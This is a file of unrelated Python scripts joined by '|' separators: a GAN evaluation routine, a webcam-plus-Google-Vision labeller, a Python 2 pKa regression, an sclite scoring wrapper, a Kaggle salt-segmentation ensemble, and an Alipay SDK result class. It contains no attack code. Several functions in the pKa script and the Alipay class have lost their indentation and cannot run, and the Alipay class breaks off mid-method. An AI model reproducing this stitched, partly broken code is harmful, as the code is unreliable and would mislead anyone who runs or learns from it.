        # Build one-hot labels: num_images of class 0, num_images of class 1, ...
        labels = torch.zeros(num_images, 1).to(device)
        for i in range(num_classes - 1):
            temp = torch.ones(num_images, 1).to(device) + i
            labels = torch.cat([labels, temp], 0)
        labels_onehot = torch.zeros(num_images * num_classes, num_classes).to(device)
        labels_onehot.scatter_(1, labels.to(torch.long), 1)
        return labels_onehot

    def sample_images(num_images, itr):
        # Generate num_images per class, itr times, and save each batch next
        # to its nearest training neighbours in pixel space.
        '''
        labels = torch.zeros((num_classes * num_images,), dtype=torch.long).to(device)
        for i in range(num_classes):
            for j in range(num_images):
                labels[i*num_images + j] = i
        labels_onehot = F.one_hot(labels, num_classes)
        '''
        train_set = datasets.ImageFolder(root=train_images_path,
                                         transform=transforms.Compose([
                                             transforms.Resize((opt.img_size, opt.img_size)),
                                             transforms.ToTensor(),
                                             transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
                                         ]))
        '''
        source_images_available = True
        if (not os.path.exists(output_train_images_path)):
            os.makedirs(output_train_images_path)
            source_images_available = False
        if (not source_images_available):
            train_loader = torch.utils.data.DataLoader(train_set,
                                                       batch_size=1,
                                                       num_workers=opt.num_workers)
        else:
            train_loader = torch.utils.data.DataLoader(train_set,
                                                       batch_size=opt.batch_size,
                                                       num_workers=opt.num_workers)
        '''
        train_loader = torch.utils.data.DataLoader(train_set,
                                                   batch_size=opt.batch_size,
                                                   num_workers=opt.num_workers)
        # load the entire training split into memory for neighbour search
        train_images = torch.FloatTensor().to(device)
        train_labels = torch.LongTensor().to(device)
        print("Loading train images...")
        for i, data in enumerate(train_loader, 0):
            img, label = data
            img = img.to(device)
            label = label.to(device)
            train_images = torch.cat([train_images, img], 0)
            train_labels = torch.cat([train_labels, label], 0)
            #if (not source_images_available):
            #    vutils.save_image(img, "{}/{}.jpg".format(output_train_images_path, i), normalize=True)
        print("Estimating nearest neighbors in pixel space, this takes a few minutes...")
        for it in range(itr):
            z = torch.randn((num_classes * num_images, opt.latent_dim)).to(device)
            labels_onehot = get_onehot_labels(num_images)
            z = torch.cat((z, labels_onehot.to(dtype=torch.float)), 1)
            sample_imgs = gen(z)
            for i in range(len(sample_imgs)):
                vutils.save_image(sample_imgs[i], "{}/{}.png".format(output_sample_images_path, i), normalize=True)
            nearest_neighbour_imgs_list = get_nearest_neighbour_pixels(sample_imgs, num_images, train_images, train_labels)
            for label, nn_imgs in enumerate(nearest_neighbour_imgs_list):
                vutils.save_image(nn_imgs.data, "{}/iter{}-{}.png".format(output_nn_pixel_images_path, it, label), nrow=num_images, padding=2, normalize=True)
            print("Saved nearest neighbors.")
        '''
        print("Estimating nearest neighbors in feature space, this takes a few minutes...")
        nearest_neighbour_imgs_list = get_nearest_neighbour_inception(sample_imgs, num_images, train_images, train_labels)
        for label, nn_imgs in enumerate(nearest_neighbour_imgs_list):
            vutils.save_image(nn_imgs.data, "{}/{}.png".format(output_nn_inception_images_path, label), nrow=num_images, padding=2, normalize=True)
        print("Saved nearest neighbors.")
        '''

    def eval_fid(gen_images_path, eval_images_path):
        # FID between two directories of images.
        print("Calculating FID...")
        fid = fid_score.calculate_fid_given_paths((gen_images_path, eval_images_path), opt.batch_size, device)
        return fid

    def evaluate(source_images_path, keep_images=True):
        # Generate one fake image per real image (random classes), resize the
        # real ones once, then compute FID between the two directories.
        dataset = datasets.ImageFolder(root=source_images_path,
                                       transform=transforms.Compose([
                                           transforms.Resize((opt.img_size, opt.img_size)),
                                           transforms.ToTensor()
                                       ]))
        dataloader = torch.utils.data.DataLoader(dataset,
                                                 batch_size=opt.batch_size,
                                                 shuffle=True,
                                                 num_workers=opt.num_workers)
        output_gen_images_path = os.path.join(opt.output_path, opt.version, opt.eval_mode)
        os.makedirs(output_gen_images_path, exist_ok=True)
        output_source_images_path = source_images_path + "_" + str(opt.img_size)
        # resized real images are cached on disk and reused on later runs
        source_images_available = True
        if (not os.path.exists(output_source_images_path)):
            os.makedirs(output_source_images_path)
            source_images_available = False
        images_done = 0
        for _, data in enumerate(dataloader, 0):
            images, labels = data
            batch_size = images.size(0)
            noise = torch.randn((batch_size, opt.latent_dim)).to(device)
            # real labels are discarded; fake images get random classes
            labels = torch.randint(0, num_classes, (batch_size,)).to(device)
            labels_onehot = F.one_hot(labels, num_classes)
            noise = torch.cat((noise, labels_onehot.to(dtype=torch.float)), 1)
            gen_images = gen(noise)
            for i in range(images_done, images_done + batch_size):
                vutils.save_image(gen_images[i - images_done, :, :, :], "{}/{}.jpg".format(output_gen_images_path, i), normalize=True)
                if (not source_images_available):
                    vutils.save_image(images[i - images_done, :, :, :], "{}/{}.jpg".format(output_source_images_path, i), normalize=True)
            images_done += batch_size
        fid = eval_fid(output_gen_images_path, output_source_images_path)
        if (not keep_images):
            print("Deleting images generated for validation...")
            rmtree(output_gen_images_path)
        return fid

    test_images_path = os.path.join(opt.data_path, "test")
    val_images_path = os.path.join(opt.data_path, "val")
    model_path = os.path.join(opt.output_path, opt.version, opt.model_file)
    gen = fcgan.Generator(noise_dim).to(device)
    # .pt files hold a bare state dict; .tar files hold a training checkpoint
    if (opt.model_file.endswith(".pt")):
        gen.load_state_dict(torch.load(model_path, map_location=device))
    elif (opt.model_file.endswith(".tar")):
        checkpoint = torch.load(model_path, map_location=device)
        gen.load_state_dict(checkpoint['g_state_dict'])
    gen.eval()
    if opt.eval_mode == "val":
        source_images_path = val_images_path
    elif opt.eval_mode == "test":
        source_images_path = test_images_path
    if opt.eval_mode == "val" or opt.eval_mode == "test":
        print("Evaluating model...")
        fid = evaluate(source_images_path)
        print("FID: {}".format(fid))
    elif opt.eval_mode == "nn":
        sample_images(opt.num_sample_images, 50)

if __name__ == '__main__':
    main()
|
from pygame.locals import *
import pygame.camera

# Initialise pygame and its camera module, then open the first V4L device.
# NOTE(review): 320x180 is an unusual capture size — confirm the device
# actually supports it.
pygame.init()
pygame.camera.init()
cam = pygame.camera.Camera("/dev/video0", (320, 180))

import io
import os
from google.cloud import vision
from google.cloud.vision import types

# service-account credentials for the Vision API are expected in vision.json
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "vision.json"
client = vision.ImageAnnotatorClient()
# Run Google Vision label detection on a local image file.
def process_image(image_name):
    """Send *image_name* to the Vision API; print and return its labels."""
    with io.open(image_name, 'rb') as image_file:
        payload = image_file.read()
    # label detection on the raw image bytes
    response = client.label_detection(image=types.Image(content=payload))
    print('Labels:')
    descriptions = []
    for annotation in response.label_annotations:
        print(annotation.description)
        descriptions.append(annotation.description)
    return descriptions
def capture(image_name="image.png"):
    """Grab one frame from the webcam, save it as *image_name*, return the name."""
    # best-effort removal of a stale file; report but ignore any failure
    try:
        os.remove(image_name)
    except Exception as err:
        print(err)
    cam.start()
    frame = cam.get_image()
    cam.stop()
    pygame.image.save(frame, image_name)
    return image_name
def process():
    """Capture a frame and run label detection on it; errors are only printed."""
    print("processing")
    try:
        process_image(capture())
    except Exception as err:
        print(err)
|
import numpy as np
import matplotlib.pyplot as plt
import xlwt
import sys
import numpy as np
from sklearn import preprocessing, cross_validation, svm
from sklearn.linear_model import LinearRegression

# Load the dataset (a pickled dict saved with np.save) whose path is the
# first command-line argument.
# NOTE(review): this file is Python 2 (print statements / raw_input below).
data=np.load(sys.argv[1]).item()
#data2=np.load('/Users/47510753/Documents/side_projects/B_final.npy').item()
#data['./B_4NH2_5NO2.out']=[['C-O',1.2451,9.976,1571.474],['C-O',1.2419,10.183,1587.718],['O-C-O',130.3039,1.874,906.507],4.19]
#data['./B_4NO2.out']=[['C-O',1.2426,10.12,1582.785],['C-O',1.2426,10.12,1582.785],['O-C-O',130.5321,1.862,904.86],3.43]
#data['./B_4OMe.out']=[['C-O',1.2454,9.986,1572.314],['C-O',1.2454,9.999,1573.321],['O-C-O',129.6075,1.904,910.652],4.5]
# write the (possibly patched) dict straight back to the same file
np.save(sys.argv[1],data)
def add_pka(data,name):
data2=np.load(sys.argv[2]).item()
ne={}
for i in data:
a,b=data[i]
d=data2[i.split('/')[-1].split('.')[0]][-1]
data[i].append(d)
ne[i]=data[i]
print ne,len(ne)
if raw_input('Save : ')=='y':
np.save(name,ne)
def add_pka_manually(data,name):
f=open('res.txt','r')
lines=f.readlines()
f.close()
ne={}
for line in lines:
nam=line.strip().split()
ne[nam[4].split('/')[-1]]=data[nam[4]]+[nam[6]]
print ne
'''
for i in data:
if '.g16' in i:
continue
ne[i]=data[i]+[float(raw_input('Enter pka : for '+i+' : '))]
print ne
'''
if raw_input('Save : ')=='y':
np.save(name,ne)
# Dump the dataset into an .xls spreadsheet: one row per molecule with the
# last element of each bond record (Qa1, Qa2, Qw) and the pKa.
def make_excel(data,name):
    classeur=xlwt.Workbook()
    sheet=classeur.add_sheet('Version1')
    entetes=('Filename','Qa1','Qa2','Qw','pKa')
    for position in range(len(entetes)):
        sheet.write(0,position,entetes[position])
    row=1
    for cle in data:
        # these two outliers are skipped on purpose
        if cle in ['R_2-C2H5-Ar.out','R_CH2Br.out']:
            continue
        a,b,c,d=data[cle]
        sheet.write(row,0,cle.split('/')[-1])
        sheet.write(row,1,str(a[-1]))
        sheet.write(row,2,str(b[-1]))
        sheet.write(row,3,str(c[-1]))
        sheet.write(row,4,str(d))
        row+=1
    classeur.save(name)
# Scatter-plot the mean C-O charge against pKa, one red dot per molecule.
def plot(data):
    # BUG FIX: the original called file.append(...) without ever defining a
    # local `file` list, so it hit the Python 2 builtin `file` type and
    # raised AttributeError on the first iteration.  The collected names
    # were never used, so the statement is simply removed.
    for i in data:
        a,b,c,d=data[i]
        avg=(a[-1]+b[-1])/2
        plt.plot(avg,d,'ro')
    plt.show()
def make_fit1(data):
    # Fit pKa ~ quadratic form of (a1, b1) where a1 = mean of the two C-O
    # charges and b1 = the O-C-O charge, using a linear regression over the
    # expanded terms [a1^2, b1^2, a1*b1, a1, b1]; then print a per-molecule
    # error table (Python 2 print statements, column width 20).
    X,y=[],[]
    file=[]
    #ne={}
    for i in data:
        # same two outliers excluded as in make_excel()
        if i in ['R_2-C2H5-Ar.out','R_CH2Br.out']:
            continue
        file.append(i.split('/')[-1])
        a,b,c,d=data[i]
        #d=data2[i][-1]
        #data[i].append(d)
        #ne[i]=data[i]
        a1=(float(a[-1])+float(b[-1]))/2
        b1=float(c[-1])
        X+=[[a1**2,b1**2,a1*b1,a1,b1]]
        y+=[[float(d)]]
        #avg=(a[-1]+b[-1])/2
        #plt.plot(avg,d,'ro')
    '''
    print ne,len(ne)
    if raw_input('Save : ')=='y':
        np.save('B_final.npy',ne)
    plt.show()
    wb.save('Benzoic_acid.xls')
    '''
    #X_train, X_test, y_train, y_test= cross_validation.train_test_split(X,y,test_size=0.0)
    clf = LinearRegression() #(n_jobs=processors)
    clf.fit(X, y)
    # R^2 on the training data itself (no held-out split)
    accuracy = clf.score(X,y)
    print 'accuracy',accuracy,'\n'
    pr=clf.predict(X)
    print 'Filename Percentage Error Actual Value Predicted Value Difference\n'
    for i in range (len(y)):
        predi=str(round(((pr[i][0]-y[i][0])/y[i][0])*100,2))+' %'
        print file[i]+' '*(20-len(file[i])),' '*(20-len(predi))+ predi, ' '*(20-len(str(y[i][0])))+str(y[i][0]) , ' '*(20-len(str(round(pr[i][0],2))))+str(round(pr[i][0],2)),' '*(20-len(str(round((y[i][0]-pr[i][0]),4))))+str(round((y[i][0]-pr[i][0]),4))
def make_fit2(data):
    # Same quadratic fit as make_fit1(), but for datasets whose entries hold
    # only two descriptors (a, b) plus the pKa, with no outlier filtering.
    X,y=[],[]
    file=[]
    #ne={}
    for i in data:
        file.append(i.split('/')[-1])
        a,b,d=data[i]
        #d=data2[i][-1]
        #data[i].append(d)
        #ne[i]=data[i]
        a1=float(a[-1])
        b1=float(b[-1])
        X+=[[a1**2,b1**2,a1*b1,a1,b1]]
        y+=[[float(d)]]
    clf = LinearRegression() #(n_jobs=processors)
    clf.fit(X, y)
    # R^2 on the training data itself (no held-out split)
    accuracy = clf.score(X,y)
    print 'accuracy',accuracy,'\n'
    pr=clf.predict(X)
    print 'Filename Percentage Error Actual Value Predicted Value Difference\n'
    for i in range (len(y)):
        predi=str(round(((pr[i][0]-y[i][0])/y[i][0])*100,2))+' %'
        print file[i]+' '*(20-len(file[i])),' '*(20-len(predi))+ predi, ' '*(20-len(str(y[i][0])))+str(y[i][0]) , ' '*(20-len(str(round(pr[i][0],2))))+str(round(pr[i][0],2)),' '*(20-len(str(round((y[i][0]-pr[i][0]),4))))+str(round((y[i][0]-pr[i][0]),4))
make_fit1(data) |
import subprocess, re
import os, platform
def tokenize(string):
    """Lower-case *string*, keeping only alphanumeric/apostrophe tokens,
    joined by single spaces (sclite-friendly normalisation)."""
    words = re.findall(r"[A-Za-z0-9\']+", string)
    return ' '.join(word.lower() for word in words)
def score_sclite(hyp, ref):
    """Score hypothesis *hyp* against reference *ref* with the external
    `sclite` tool.

    Returns a dict with token counts, the aligned ref/hyp strings, and an
    'accuracy' percentage string truncated to 4 characters — or None on an
    unsupported platform.  Parsing relies on the fixed layout of the
    single-utterance test.pra report (counts on line 12, alignment on
    lines 13-14), so it is tied to this exact invocation.
    """
    _ref = tokenize(ref)
    _hyp = tokenize(hyp)
    #print (hyp)
    #print ("poo")
    #print ("Hypothesis" + str (_hyp))
    # sclite transcript format: tokens followed by an utterance id "(a)"
    with open("ref.ref", 'w') as f:
        f.write(_ref + " (a)\n")
    with open("hyp.hyp", 'w') as f:
        f.write(_hyp + " (a)\n")
    # platform-dependent shell command
    #sclite_windows = ["sclitewin/sclite"]
    sclite_windows = ["sclite"]
    sclite_macosx = ["sclitemac/sclite"]
    sclite_linux = ["sclitelin/sclite"]
    cmd_args = ["-i", "spu_id",
                "-o", "pralign",
                "-r", "ref.ref",
                "-h", "hyp.hyp",
                "-n", "test"]
    if platform.system() == "Windows":
        cmd = sclite_windows + cmd_args
    elif platform.system() == "Darwin":
        cmd = sclite_macosx + cmd_args
    elif platform.system() == "Linux":
        cmd = sclite_linux + cmd_args
    else:
        return None
    subprocess.call(cmd)
    results = {}
    # parse the fixed-offset report written by sclite
    with open("test.pra", 'r') as f:
        text = f.readlines()
    numbers = text[11][22:].split(" ")
    results['num'] = {'correct': numbers[0],
                      'substitutions': numbers[1],
                      'deletions': numbers[2],
                      'insertions': numbers[3]}
    results['ref'] = text[12][6:].strip()
    results['hyp'] = text[13][6:].strip()
    #print(results)
    # word accuracy = correct / (correct + substitutions + deletions)
    denominator = int(results['num']['correct']) + \
                  int(results['num']['substitutions']) + \
                  int(results['num']['deletions'])
    results['accuracy'] = str(100 * float(results['num']['correct'])\
                              / (denominator))[:4]
    # clean up the temporary transcript and report files
    os.remove("ref.ref")
    os.remove("hyp.hyp")
    os.remove("test.pra")
    return results
|
import os
import sys
sys.path.append('../../../')
import pandas as pd
from dependencies import *
from settings import *
from reproducibility import *
from models.TGS_salt.Unet34_scSE_hyper import Unet_scSE_hyper as Net
import pickle
from tqdm import tqdm
from bunny import bunny

# ensemble identifier used to name the cached sigmoid dumps below
mode = "100models_weighted"
# True: re-read every member model's predictions; False: reuse cached sums
TUNE=True

# list of the "stable" member model files to ensemble (first, unnamed column)
df = pd.read_csv("stable.csv")
file_list = list(df["Unnamed: 0"])
print(file_list)

# running sums of sigmoid maps for the four model families
preds1=None
preds2=None
preds3=None
preds4=None

# NOTE(review): glob presumably comes from `from dependencies import *`
file_list_2 = glob.glob(os.path.join('/home/liaop20/ml-arsenal/projects/TGS_salt/ocnet256',"*.p"))
#file_list = [f.split('/')[-1].split('.npy')[0] for f in file_list]
test_path = os.path.join("/home/liaop20/data/salt", 'test')
#test_path = os.path.join("/data/kaggle/salt", 'test')
test_file_list = glob.glob(os.path.join(test_path, 'images', '*.png'))
test_file_list = [f.split('/')[-1].split('.')[0] for f in test_file_list]
print(test_file_list[:3])
height, width = 101, 101
# The 101x101 images were padded up to the next multiple of 32 (128) for
# inference; compute how much padding sits on each side so it can be cropped.
y_pad = 0 if height % 32 == 0 else 32 - height % 32
y_min_pad = int(y_pad / 2)
y_max_pad = y_pad - y_min_pad
x_pad = 0 if width % 32 == 0 else 32 - width % 32
x_min_pad = int(x_pad / 2)
x_max_pad = x_pad - x_min_pad
# BUG FIX: this region contained unresolved git merge-conflict markers
# (<<<<<<< / ======= / >>>>>>>), a syntax error.  Resolved by keeping the
# more complete branch, which also prepares the 256px OCNet source (R3)
# and the 202 -> 256 padding bounds it needs.
height1, width1 = 202, 202
if height1 % 256 == 0:
    y_min_pad1 = 0
    y_max_pad1 = 0
else:
    y_pad1 = 256 - height1 % 256
    y_min_pad1 = int(y_pad1 / 2)
    y_max_pad1 = y_pad1 - y_min_pad1
if width1 % 256 == 0:
    x_min_pad1 = 0
    x_max_pad1 = 0
else:
    x_pad1 = 256 - width1 % 256
    x_min_pad1 = int(x_pad1 / 2)
    x_max_pad1 = x_pad1 - x_min_pad1

# checkpoint directories for the three prediction sources
R1 = '/data/liao_checkpoints/100models/'
R2 = '/data/liao_checkpoints/ocnet/'
R3 = '/data/liao_checkpoints/ocnet256/'
#R1 = '/home/liaop20/ml-arsenal/projects/TGS_salt/100models/'
#R2 = '/home/liaop20/ml-arsenal/projects/TGS_salt/ocnet/'
#1_ResNet34_res_25600029500_model.p
#ResNet34_res_256_fold200119500_model.p'
# number of member models accumulated per family
ct1 = 0
ct2 = 0
ct3 = 0
ct4 = 0
if TUNE:
    # Accumulate each member model's sigmoid maps into its family's running
    # sum.  File names encode the fold and checkpoint id after "fold".
    # BUG FIX: this loop contained a second unresolved git merge conflict;
    # resolved by keeping the OCnet256 branch that reads from R3 and crops
    # the 256px padding (the discarded HEAD branch wrongly reloaded the R1
    # ResNet checkpoints for OCNet files).
    for file1 in tqdm(file_list):
        model = ""
        if file1.find("OCnet") == -1 and file1.find("256") != -1:
            # 256px U-Net family: load, then resize maps back to 101x101
            fold = file1[file1.find("fold") + 4:file1.find("fold") + 5]
            checkpt = file1[file1.find("fold") + 5:file1.find("_simu")]
            sigmoids_1 = pickle.load(open(R1 + fold + "_ResNet34_res_256" + checkpt + "_model.p", "rb"))
            images = []
            for i in range(18000):
                img = cv2.resize(sigmoids_1[i, :, :], (101, 101))
                images.append(img)
            sigmoids_1 = np.array(images)
            ct1 = ct1 + 1
            model = "256"
        elif file1.find("OCnet") == -1:
            # 128px U-Net family.  NOTE(review): loads from the same R1
            # "..._res_256..." naming as the 256 branch — confirm intended.
            fold = file1[file1.find("fold") + 4:file1.find("fold") + 5]
            checkpt = file1[file1.find("fold") + 5:file1.find("_simu")]
            sigmoids_2 = pickle.load(open(R1 + fold + "_ResNet34_res_256" + checkpt + "_model.p", "rb"))
            images = []
            for i in range(18000):
                img = cv2.resize(sigmoids_2[i, :, :], (101, 101))
                images.append(img)
            sigmoids_2 = np.array(images)
            ct2 = ct2 + 1
            model = "128"
        elif file1.find("OCnet256") != -1:
            # 256px OCNet family: crop the 202->256 padding, then resize
            fold = file1[file1.find("fold") + 4:file1.find("fold") + 5]
            checkpt = file1[file1.find("fold") + 5:file1.find("_simu")]
            sigmoids_4 = pickle.load(open(R3 + "ocnet256" + fold + checkpt + ".p", "rb"))
            sigmoids_4 = sigmoids_4[:, y_min_pad1:256 - y_max_pad1, x_min_pad1:256 - x_max_pad1]
            images = []
            for i in range(18000):
                img = cv2.resize(sigmoids_4[i, :, :], (101, 101))
                images.append(img)
            sigmoids_4 = np.array(images)
            ct4 = ct4 + 1
            model = "ocnet256"
        else:
            # 128px OCNet family: crop the 101->128 inference padding
            fold = file1[file1.find("fold") + 4:file1.find("fold") + 5]
            checkpt = file1[file1.find("fold") + 5:file1.find("_simu")]
            sigmoids_3 = pickle.load(open(R2 + "ocnet" + fold + checkpt + ".p", "rb"))
            sigmoids_3 = sigmoids_3[:, y_min_pad:128 - y_max_pad, x_min_pad:128 - x_max_pad]
            ct3 = ct3 + 1
            model = "ocnet"
        # sanity counter: exactly one family must absorb this file
        i = 0
        if preds1 is None and model == "256":
            i = i + 1
            preds1 = sigmoids_1
        elif model == "256":
            i = i + 1
            preds1 = preds1 + sigmoids_1
            print(preds1.mean() / ct1)
        if preds2 is None and model == "128":
            i = i + 1
            preds2 = sigmoids_2
        elif model == "128":
            i = i + 1
            preds2 = preds2 + sigmoids_2
            print(preds2.mean() / ct2)
        if preds3 is None and model == "ocnet":
            i = i + 1
            preds3 = sigmoids_3
        elif model == "ocnet":
            i = i + 1
            preds3 = preds3 + sigmoids_3
            print(preds3.mean() / ct3)
        if preds4 is None and model == "ocnet256":
            i = i + 1
            preds4 = sigmoids_4
        elif model == "ocnet256":
            i = i + 1
            preds4 = preds4 + sigmoids_4
            print(preds4.mean() / ct4)
        assert (i == 1)
    # turn the sums into per-family means and cache them on disk
    preds1 = preds1 / ct1
    preds2 = preds2 / ct2
    preds3 = preds3 / ct3
    preds4 = preds4 / ct4
    pickle.dump(preds1, open(mode + "_sum_all_sigmoids_1.p", "wb"))
    pickle.dump(preds2, open(mode + "_sum_all_sigmoids_2.p", "wb"))
    pickle.dump(preds3, open(mode + "_sum_all_sigmoids_3.p", "wb"))
    # BUG FIX: the original dumped preds3 into the *_4 cache file as well,
    # so the ocnet256 means were never saved
    pickle.dump(preds4, open(mode + "_sum_all_sigmoids_4.p", "wb"))
if not(TUNE):
    # reuse the per-family mean sigmoid maps cached by a previous TUNE run
    preds1=pickle.load(open( mode+"_sum_all_sigmoids_1.p","rb"))
    preds2=pickle.load(open( mode+"_sum_all_sigmoids_2.p","rb"))
    preds3=pickle.load(open( mode+"_sum_all_sigmoids_3.p","rb"))
    preds4=pickle.load(open( mode+"_sum_all_sigmoids_4.p","rb"))
"""
print(tuple2)
preds1 = tuple1[0]
ct1= tuple1[1]
preds2 = tuple2[0]
ct2= tuple2[1]
preds3 = tuple3[0]
ct3= tuple3[1]
print(preds1[0].shape)
print((ct1,ct2,ct3))
print(preds2)
for i in tqdm(range(len(preds1))):
    preds1[i,:,:]/=ct1
    preds2[i,:,:]/=ct2
    preds3[i,:,:]/=ct3
#preds1=np.true_divide(preds1[0],ct1)
#preds2=np.true_divide(preds2,ct2)
#preds3=np.true_divide(preds3,ct3)
"""
print(preds1.mean())
print(preds2.mean())
print(preds3.mean())
print(preds4.mean())
# weighted blend of the four family means (weights sum to 1.0)
preds = preds1*0.35+preds2*0.1+preds3*0.1+preds4*0.45
print(preds.mean())
pickle.dump(preds,open("stable_all_sigmoids.p","wb"))
# binarise at the tuned probability threshold before run-length encoding
threshold = 0.45
binary_prediction = (preds > threshold).astype(int)
def rle_encoding(x):
    """Run-length encode mask *x*: flatten column-major (1-indexed pixels)
    and return a flat list of alternating (start, length) values."""
    runs = []
    previous = -2
    for pixel in np.where(x.T.flatten() == 1)[0]:
        if runs and pixel == previous + 1:
            # extends the current run
            runs[-1] += 1
        else:
            # start a new run of length 1 at this (1-indexed) pixel
            runs.extend([pixel + 1, 1])
        previous = pixel
    return runs
# RLE-encode every predicted mask and write the Kaggle submission CSV
all_masks = []
for p_mask in list(binary_prediction):
    p_mask = rle_encoding(p_mask)
    all_masks.append(' '.join(map(str, p_mask)))

submit = pd.DataFrame([test_file_list, all_masks]).T
submit.columns = ['id', 'rle_mask']
submit.to_csv('./100_stable_models_weighted.csv', index = False)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class EsignResult(object):
    def __init__(self):
        # All fields default to None and are populated through the property
        # setters below / by the Alipay SDK's response parsing.
        self._agreement_id = None
        self._agreement_url = None
        self._apply_dutiable_mode_enum = None
        self._contractor_code = None
        self._contractor_name = None
        self._employee_alipay_logon_id = None
        self._employer_code = None
        self._identification_in_belonging_employer = None
        self._out_biz_no = None
        self._pay_salary_mode_enum = None
        self._sign_time = None
        self._status = None
        self._tax_optimization_mode = None
        self._termination_time = None
        self._two_party_status = None
    # --- trivial accessor pairs: one read/write property per private field,
    # --- following the Alipay SDK's generated-model convention
    @property
    def agreement_id(self):
        return self._agreement_id
    @agreement_id.setter
    def agreement_id(self, value):
        self._agreement_id = value
    @property
    def agreement_url(self):
        return self._agreement_url
    @agreement_url.setter
    def agreement_url(self, value):
        self._agreement_url = value
    @property
    def apply_dutiable_mode_enum(self):
        return self._apply_dutiable_mode_enum
    @apply_dutiable_mode_enum.setter
    def apply_dutiable_mode_enum(self, value):
        self._apply_dutiable_mode_enum = value
    @property
    def contractor_code(self):
        return self._contractor_code
    @contractor_code.setter
    def contractor_code(self, value):
        self._contractor_code = value
    @property
    def contractor_name(self):
        return self._contractor_name
    @contractor_name.setter
    def contractor_name(self, value):
        self._contractor_name = value
    @property
    def employee_alipay_logon_id(self):
        return self._employee_alipay_logon_id
    @employee_alipay_logon_id.setter
    def employee_alipay_logon_id(self, value):
        self._employee_alipay_logon_id = value
    @property
    def employer_code(self):
        return self._employer_code
    @employer_code.setter
    def employer_code(self, value):
        self._employer_code = value
    @property
    def identification_in_belonging_employer(self):
        return self._identification_in_belonging_employer
    @identification_in_belonging_employer.setter
    def identification_in_belonging_employer(self, value):
        self._identification_in_belonging_employer = value
    @property
    def out_biz_no(self):
        return self._out_biz_no
    @out_biz_no.setter
    def out_biz_no(self, value):
        self._out_biz_no = value
    @property
    def pay_salary_mode_enum(self):
        return self._pay_salary_mode_enum
    @pay_salary_mode_enum.setter
    def pay_salary_mode_enum(self, value):
        self._pay_salary_mode_enum = value
    @property
    def sign_time(self):
        return self._sign_time
    @sign_time.setter
    def sign_time(self, value):
        self._sign_time = value
    @property
    def status(self):
        return self._status
    @status.setter
    def status(self, value):
        self._status = value
    @property
    def tax_optimization_mode(self):
        return self._tax_optimization_mode
    @tax_optimization_mode.setter
    def tax_optimization_mode(self, value):
        self._tax_optimization_mode = value
    @property
    def termination_time(self):
        return self._termination_time
    @termination_time.setter
    def termination_time(self, value):
        self._termination_time = value
    @property
    def two_party_status(self):
        return self._two_party_status
    @two_party_status.setter
    def two_party_status(self, value):
        self._two_party_status = value
def to_alipay_dict(self):
params = dict()
if self.agreement_id:
if hasattr(self.agreement_id, 'to_alipay_dict'):
params['agreement_id'] = self.agreement_id.to_alipay_dict()
else:
params['agreement_id'] = self.agreement_id
if self.agreement_url:
if hasattr(self.agreement_url, 'to_alipay_dict'):
params['agreement_url'] = self.agreement_url.to_alipay_dict()
else:
params['agreement_url'] = self.agreement_url
if self.apply_dutiable_mode_enum:
if hasattr(self.apply_dutiable_mode_enum, 'to_alipay_dict'):
params['apply_dutiable_mode_enum'] = self.apply_dutiable_mode_enum.to_alipay_dict()
else:
params['apply_dutiable_mode_enum'] = self.apply_dutiable_mode_enum
if self.contractor_code:
if hasattr(self.contractor_code, 'to_alipay_dict'):
params['contractor_code'] = self.contractor_code.to_alipay_dict()
else:
params['contractor_code'] = self.contractor_code
if self.contractor_name:
if hasattr(self.contractor_name, 'to_alipay_dict'):
params['contractor_name'] = self.contractor_name.to_alipay_dict()
else:
params['contractor_name'] = self.contractor_name
if self.employee_alipay_logon_id:
if hasattr(self.employee_alipay_logon_id, 'to_alipay_dict'):
params['employee_alipay_logon_id'] = self.employee_alipay_logon_id.to_alipay_dict()
else:
params['employee_alipay_logon_id'] = self.employee_alipay_logon_id
if self.employer_code:
if hasattr(self.employer_code, 'to_alipay_dict'):
params['employer_code'] = self.employer_code.to_alipay_dict()
else:
params['employer_code'] = self.employer_code
if self.identification_in_belonging_employer:
if hasattr(self.identification_in_belonging_employer, 'to_alipay_dict'):
params['identification_in_belonging_employer'] = self.identification_in_belonging_employer.to_alipay_dict()
else:
params['identification_in_belonging_employer'] = self.identification_in_belonging_employer
if self.out_biz_no:
if hasattr(self.out_biz_no, 'to_alipay_dict'):
params['out_biz_no'] = self.out_biz_no.to_alipay_dict()
else:
params['out_biz_no'] = self.out_biz_no
if self.pay_salary_mode_enum:
if hasattr(self.pay_salary_mode_enum, 'to_alipay_dict'):
params['pay_salary_mode_enum'] = self.pay_salary_mode_enum.to_alipay_dict()
else:
params['pay_salary_mode_enum'] = self.pay_salary_mode_enum
if self.sign_time:
if hasattr(self.sign_time, 'to_alipay_dict'):
params['sign_time'] = self.sign_time.to_alipay_dict()
else:
params['sign_time'] = self.sign_time
if self.status:
if hasattr(self.status, 'to_alipay_dict'):
params['status'] = self.status.to_alipay_dict()
else:
params['status'] = self.status
if self.tax_optimization_mode:
if hasattr(self.tax_optimization_mode, 'to_alipay_dict'):
params['tax_optimization_mode'] = self.tax_optimization_mode.to_alipay_dict()
else:
params['tax_optimization_mode'] = self.tax_optimization_mode
if self.termination_time:
if hasattr(self.termination_time, 'to_alipay_dict'):
params['termination_time'] = self.termination_time.to_alipay_dict()
else:
params['termination_time'] = self.termination_time
if self.two_party_status:
if hasattr(self.two_party_status, 'to_alipay_dict'):
params['two_party_status'] = self.two_party_status.to_alipay_dict()
else:
params['two_party_status'] = self.two_party_status
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = EsignResult()
if 'agreement_id' in d:
o.agreement_id = d['agreement_id']
if 'agreement_url' in d:
o.agreement_url = d['agreement_url']
if 'apply_dutiable_mode_enum' in d:
o.apply_dutiable_mode_enum = d['apply_dutiable_mode_enum']
if 'contractor_code' in d:
o.contractor_code = d['contractor_code']
if 'contractor_name' in d:
o.contractor_name = d['contractor_name']
if 'employee_alipay_logon_id' in d:
o.employee_alipay_logon_id = d['employee_alipay_logon_id']
if 'employer_code' in d:
o.employer_code = d['employer_code']
if 'identification_in_belonging_employer' in d:
o.identification_in_belonging_employer = d['identification_in_belonging_employer']
if 'out_biz_no' in d:
o.out_biz_no = d['out_biz_no']
if 'pay_salary_mode_enum' in d:
o.pay_salary_mode_enum = d['pay_salary_mode_enum']
if 'sign_time' in d:
o.sign_time = d['sign_time']
if 'status' in d:
o.status = d['status']
